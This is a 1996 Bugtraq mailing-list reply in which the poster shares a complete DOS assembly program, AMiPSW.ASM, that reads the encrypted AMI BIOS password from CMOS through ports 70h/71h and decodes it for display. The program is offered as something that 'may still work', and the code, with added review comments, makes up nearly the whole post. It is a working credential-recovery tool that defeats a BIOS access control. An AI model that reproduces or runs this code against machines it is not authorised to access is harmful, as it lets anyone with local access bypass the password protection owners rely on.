Date: Thu, 21 Nov 1996 08:36:25 -0800
Reply-To: Roger Moar <rmoar@apertos0.csc.UVic.CA>
Sender: Bugtraq List <BUGTRAQ@NETSPACE.ORG>
From: Roger Moar <rmoar@apertos0.csc.UVic.CA>
Subject: Re: BoS: Magic password of some linux-box(Hardware..)
X-To: handcuff@concentric.net
In-Reply-To: <199611202101.QAA17806@cliff.cris.com> from "Brian F. Knoll" at
Nov 20, 96 09:04:22 pm
> Does anyone know if only the Award BIOS is susceptible to this? In other
> words, are other BIOSes, such as AMI BIOS, susceptible to the same sort of
> behavior?
>
> Brian
I don't really remember where I got the following code, but it
worked a few years ago on a 486 machine. If AMI hasn't changed things
much, it may still work.
-Roger.
----------------------------------------------------------------------
; AMiPSW.ASM - Decodes and displays the Ami-Bios-Password!
; coded by mEsCaL/ThE SkeWerS
; v1.1 Toad Hall Tweak, 12 Mar 95
; - Minor optimizing (just can't resist)
; - Adding some comments
; David Kirschbaum, Toad Hall
; Single code segment: this is a .COM image, so at load CS = DS = ES = SS
; and the code below relies on that (stosb writes through ES:DI without
; ever setting ES).
CODE SEGMENT
ORG 100h ;.COM entry point, just past the 256-byte PSP
ASSUME CS:CODE,DS:CODE
Start PROC NEAR
; Entry point of the .COM image. Flow: print '[', copy 7 CMOS bytes
; into Password, decode them one by one relative to the previous byte,
; print ']', exit with ERRORLEVEL 0.
; Register roles:
;   cl = CMOS index while reading; later the candidate plaintext byte
;   di = cursor into Password
;   ch = shift-register state during decoding, ah = scratch copy of it
;   dx = dh counts set tap bits, dl is parity scratch
; NOTE(review): real-mode port I/O (out 70h / in 71h) needs no privilege
; under DOS, so CMOS is readable by any program run on the machine; a
; password kept there only deters casual access, not local code.
; <-=-> THiS ONE READS THE ENCRYPTED PASSWORD FROM CMOS <-=->
mov cl,'[' ;Bracket the password v1.1
call CharOut ;display it v1.1
cld ;insure forward v1.1 (stosb below must increment di)
mov cl,0b7h ;CMOS starting address (index 0B7h, 7 bytes through 0BDh)
;v1.1 lea di,Password
mov di,offset Password ; v1.1
push di ;save for later v1.1
Read_Password:
mov al,cl ;CMOS address we want
out 70h,al ;select CMOS index
jmp $+2 ;delay a tick (jump to next instruction; classic I/O settle idiom)
in al,71h ;Get password char
;v1.1 mov [di],al ;stuff in buffer
;v1.1 inc di ;bump
stosb ;stuff in buffer v1.1 -- ES:[di++] = al, relies on ES = CS (.COM load)
inc cl ;bump CMOS address
cmp cl,0b7h+7 ;done 7 chars yet?
jnz Read_Password ;not yet
; <-=-> NOW, WE HAVE TO DECRYPT CHAR BY CHAR <-=->
;v1.1 lea di,Password
pop di ;restore pointer to password v1.1
and byte ptr [di],0f0h ;mask first char (low nibble dropped; byte 0 itself is never printed)
inc di ;point to next char
; Invariant from here: di points at the byte being decoded and [di-1]
; holds the byte before it; each byte is decoded relative to its predecessor.
Decrypt_Next:
cmp di,Offset Password+7 ;hit end?
jnl Completed ;yep (signed compare on offsets; harmless in a tiny .COM)
cmp byte ptr [di],0 ;current char a 0?
jz Completed ;yep, 0 terminated
xor cl,cl ;handy 0 -- cl counts shift-register steps from here
mov ch,byte ptr [di-1] ;get previous char
; One pass through Decrypt advances ch by one step of an 8-bit shift
; register: ch = (ch >> 1) | (parity(bits 7,6,1,0 of ch) << 7).
; cl counts the steps until ch equals the current byte; that count is
; the character printed below.
; NOTE(review): there is no step limit. If [di] is not reachable from
; [di-1] (e.g. the first byte masked to 0 followed by a non-zero byte,
; since state 0 stays 0) cl wraps at 256 and this loop never terminates.
Decrypt:
inc cl ;build char in CL
mov ah,ch ;char to decrypt
xor dx,dx ;dh = number of set tap bits, dl = scratch
test ah,10000000b ;tap: bit 7
jz NotSet7
inc dh
NotSet7:
test ah,01000000b ;tap: bit 6
jz NotSet6
inc dh
NotSet6:
test ah,00000010b ;tap: bit 1
jz NotSet2
inc dh
NotSet2:
test ah,00000001b ;tap: bit 0
jz NotSet1
inc dh
NotSet1:
; Raise dl to the first even value >= dh (at least 2), then dl -= dh:
; dl ends as 1 when dh is odd, else 0 or 2 -- i.e. the tap parity.
add dl,2
cmp dl,dh
jl NotSet1 ;loop
sub dl,dh
shr ch,1 ;shift state right; feedback bit is inserted into bit 7 below
cmp dl,1 ;odd tap parity?
jnz $+5 ;if not, skip the add: hard-coded as jnz (2 bytes) + add ch,80h (3 bytes)
add ch,80h ;set bit 7 as the feedback bit
cmp ch,byte ptr [di] ;match next char?
jnz Decrypt ;nope, continue
; <-=-> AND FiNALLY, WE HAVE TO OUTPUT OUR DECRYPTED CHAR <-=->
mov ah,2 ;display char function
mov dl,cl ;this char
int 21h
inc di ;next char
jmp Decrypt_Next ;loop
; <-=-> THAT'S ALL? WELL, THEN LET'S QUiT DiZ SH**! :-) <-=->
Completed:
mov cl,']' ;Close the bracket v1.1
call CharOut ;display it v1.1
mov ax,4c00h ;terminate, ERRORLEVEL 0
int 21h
Start ENDP
;v1.1 New function: enter with char to display in CL
CharOut PROC NEAR ;v1.1
; void CharOut(char c) -- c arrives in CL.
; Writes one character to standard output via DOS int 21h, AH=02h (char in DL).
; Clobbers: ah, dl, plus whatever the DOS call itself alters.
mov dl,cl ;character to write
mov ah,2 ;DOS: display character
int 21h
ret
CharOut ENDP
;Password DB 6 DUP (?)
; v1.1 replaced the 6-byte reservation above with a bare label. The read
; loop stores 7 bytes starting here (one more than the old DB reserved),
; into the memory immediately after the loaded .COM image -- presumably
; relying on the rest of the 64K segment being free; confirm for the
; target environment.
Password label byte ;dynamic buffer v1.1
CODE ENDS
END Start
--
Roger Moar -- rmoar@csr.uvic.ca | http://apertos0.csc.uvic.ca/~rmoar